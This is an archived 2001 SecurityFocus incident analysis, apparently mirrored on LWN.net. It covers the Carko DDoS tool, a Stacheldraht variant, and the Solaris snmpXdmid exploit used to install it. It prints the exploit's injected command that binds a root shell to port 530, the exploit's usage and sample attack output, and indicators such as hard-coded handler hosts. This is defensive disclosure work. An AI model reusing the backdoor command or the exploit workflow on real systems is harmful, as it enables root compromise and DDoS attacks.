![[LWN Logo]](/images/lcorner.png) |
|
![[LWN.net]](/images/Included.png) |
From: Ryan Russell
To: INCIDENTS@SECURITYFOCUS.COM
Subject: Carko/snmpXdmid Analysis v1.0
Date: Wed, 18 Apr 2001 17:17:40 -0600
Carko/Stacheldraht v1.666 + antigl + yps Distributed Denial of Service Tool
4/18/2001 v1.0
The SecurityFocus ARIS Analyst Team wishes to thank Stefan Wagner for his
contribution of the s-no binary, Borja Marcos for his contribution of
files from a compromised host that had a rootkit installed, Kurt
Grutzmacher for the source code to the Solaris x86 8 exploit, and our
anonymous contributors.
There have been recent reports of an allegedly new Distributed Denial of
Service (DDOS) tool being implemented in the wild named "Carko". Upon
further analysis of this tool, it has been confirmed that "Carko" is
actually a copy of the "Stacheldraht v1.666 + antigl + yps" originally
released by Psychoid and Randomizer, January of this year, with some minor
modifications. Carko was initially publicized to the Incidents mailing
list by an anonymous source.
"Stacheldraht v1.666 + antigl + yps" is a variant of the original
"Stacheldraht" DDOS tool which was based upon the "Tribal Flood Network"
and "trin00" DDOS tools. As many of you may recall, these DDOS tools were
attributed in crippling many high-profile e-commerce sites such as Yahoo!,
eBay, Amazon, etc. during February of 2000 by overwhelming these servers
with enormous amounts of traffic, thus preventing legitimate requests from
being fulfilled.
Carko is a near replica of Stacheldraht v1.666 + antigl + yps with some
very slight variations:
1) Inspection of the binaries reveals that as little as one line of source
code differs between Carko and Stacheldraht v1.666 + antigl + yps. Carko
contains a different hard-coded IP address, 209.198.242.114, used to test
spoofing while Stacheldraht v1.666 + antigl + yps uses the address
3.3.3.3.
2) The Carko executable can be typically found in the directory
/usr/share/man/mansps/ddos/carko.
3) It has been reported that a file named td was copied from elsewhere to
the compromised host, and given a local name of carko during the rcp
process. The td name is the original name for the "client" in
Stacheldraht v1.666 + antigl + yps, which carko is a modification of.
There are two hard-coded master servers (handlers) in this version of
Carko. Master servers are added during the make process. These are:
131.216.135.41, sunset.ccsn.nevada.edu
152.2.21.117, cc-matrix6.oit.unc.edu
While Carko is fundamentally just a rehash of a dated yet still effective
DDOS tool, attackers are using much more recent exploits in order to
leverage Carko/Stacheldraht v1.666 + antigl + yps. Specifically, there
have been reported cases of the Solaris snmpXdmid buffer overflow
vulnerability being exploited in order to backdoor systems and deploy
Carko. The snmpXdmid vulnerability was reported on March 15, 2001 and
working exploit is being utilized in the wild. Due to the fact that
snmpXdmid is a service initiated by root, any code executed by an
unauthorized malicious attacker would be run with superuser privileges.
For more information regarding this vulnerability, please see the
following database entry:
http://www.securityfocus.com/bid/2417
Typically, hosts are initially scanned for the RPC Portmapper (port 111)
requesting RPC program number 1000249, version 1, protocol 6 (TCP). This
is the snmpXdmid service, usually started via /etc/rc3.d/S77dmi. After
verifying that snmpXdmid is indeed running, an attacker may compromise the
system via the buffer overflow vulnerability. While the attacker can
perform virtually any action they so desire if successful exploitation
occurs, many users have reported that a backdoor, and subsequently Carko,
have been installed following snmpXdmid exploitation.
SnmpXdmid/s-no Exploit Analysis
At least one binary copy of the snmpXdmid exploit has been found in the
wild. This was discovered on a honeypot host, and was named s-no. It's a
Sparc ELF binary, compiled with Sun's WorkShop Compiler 4.2 on a Solaris
2.6 host.
The exploit is run from the command-line, and takes a victim IP address,
and a victim OS version number as input. The exploit helpfully provides
instructions if the parameters are not supplied:
# ./s-no
snmpXdmisd exploit for solaris SPARC
Usage : ./s-no hostname 6|7|8
E.g. $ ./s-no 127.0.0.1 6 (for solaris 2.6)
Upon running with the proper parameters, it queries the victim for the
vulnerable daemon via portmapper, as noted previously. It then connects
to the vulnerable service, and delivers the overflow string. Contained
within the string is the set of commands that will be executed on the
victim upon successful exploitation:
echo courier stream tcp nowait root /bin/sh sh -i >
/tmp/.x;/usr/sbin/inetd -s /tmp/.x;rm -f /tmp/.x;nohup
/etc/init.d/init.dmi start 1>&2 2>/dev/null &\;
The above set of commands creates a root shell on port 530 ("courier" is
mapped to 530 in /etc/services), cleans up it's temp file, and restarts
the DMI daemon, which had crashed during the overflow.
By itself, this is easy to clean up after. Simply stop or upgrade the
vulnerable DMI daemon. After the 530 backdoor is connected to once, it
does not restart. However, as was previously noted, the attacker usually
connects to 530 immediately, and installs additional software, such as
Carko. In at least one instance, a full rootkit was installed.
Here's what s-no looks like from the attacker's perspective:
$ ./s-no 64.81.99.152 6
retaddr = 0xef4a4398
safeaddr = 0xef20b330
clnt_create: RPC: Unknown host
$
$ ./s-no 64.81.99.152 7
retaddr = 0xff0369e0
safeaddr = 0xfea0b644
clnt_call[_DmiComponentAdded]: RPC: Timed out
Now try to connect the target 530 port, good luck.:)
$
$ ./s-no 64.81.99.152 8
retaddr = 0xff0369e0
safeaddr = 0xfea0b644
clnt_call[_DmiComponentAdded]: RPC: Timed out
Now try to connect the target 530 port, good luck.:)
$
The attack for Solaris 6 has a different set of offsets from 7 and 8, and
does not appear to work properly, at least not from our Solaris 7 test
platform. The attacks for 7 and 8 execute as expected. The RPC time out
message is due to the remote victim service dying following delivery of
the exploit. The exploit then goes on to invite the attacker to connect
to port 530. The exploit is not successful in every single case, as at
least one victim machines we tested didn't execute the commands as
expected, though it was vulnerable. The DMI daemon still crashed,
however, which blocks further attempts until it is restarted. This
particular exploit contains Sparc shellcode, so it won't work on Solaris
x86 as-is, but an x86 version should be easy to create, so that is no
guarantee of safety. There also exists what is reported to be a Solaris
x86 8 exploit.
Attached to this note is a packet trace, truss output, and a capture of
the TCP data sent, captured by using netcat to listen on a port that
portmapper was configured to advertise as the vulnerable service.
This is the first version of this analysis. Additional versions will be
published soon, containing analysis of a rootkit that was installed in one
instance of a snmpxdmid compromise, and analysis of source code to a
reported Solaris x86 8 exploit for snmpxdmid, which is different from the
once discussed in this document.
Resources:
"Carko Information" Incidents Mailing List Message
http://www.securityfocus.com/archive/75/177265
New Variants of Trinity and Stacheldraht Distributed Denial of Service Tools
http://xforce.iss.net/alerts/advise61.php
"Trinity v3/ Stacheldraht 1.666" Distributed Denial of Service Tool
http://www.nipc.gov/warnings/advisories/2000/00-055.htm
The "Stacheldraht" distributed denial of service attack tool
http://www.securityfocus.com/library/1999
Distributed Denial of Service Defense Tactics
http://www.securityfocus.com/library/1930
Solaris snmpXdmid Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/2417